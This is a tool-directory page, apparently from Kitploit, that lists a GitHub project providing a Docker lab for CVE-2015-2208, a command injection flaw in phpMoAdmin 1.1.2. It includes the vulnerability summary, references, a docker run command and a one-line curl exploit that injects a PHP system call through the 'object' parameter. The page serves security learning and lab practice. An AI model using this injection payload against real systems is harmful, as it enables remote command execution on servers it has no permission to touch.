Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2015-2208 — Docker simulating cve-2015-2208 vulnerability | Kitploit
Tools/GitHubGitHub/ptantiku/cve-2015-2208
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubptantiku/cve-2015-2208

cve-2015-2208

Docker simulating cve-2015-2208 vulnerability

View Repository
211 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

#Dockerfile to simulate environment for CVE-2015-2208#

The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter.

Discovered by: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

References:

  • http://seclists.org/fulldisclosure/2015/Mar/19
  • http://www.exploit-db.com/exploits/36251/
  • https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2208

##Test environment##

root@kitploit:~
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##Exploit##

root@kitploit:~
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
Download Tool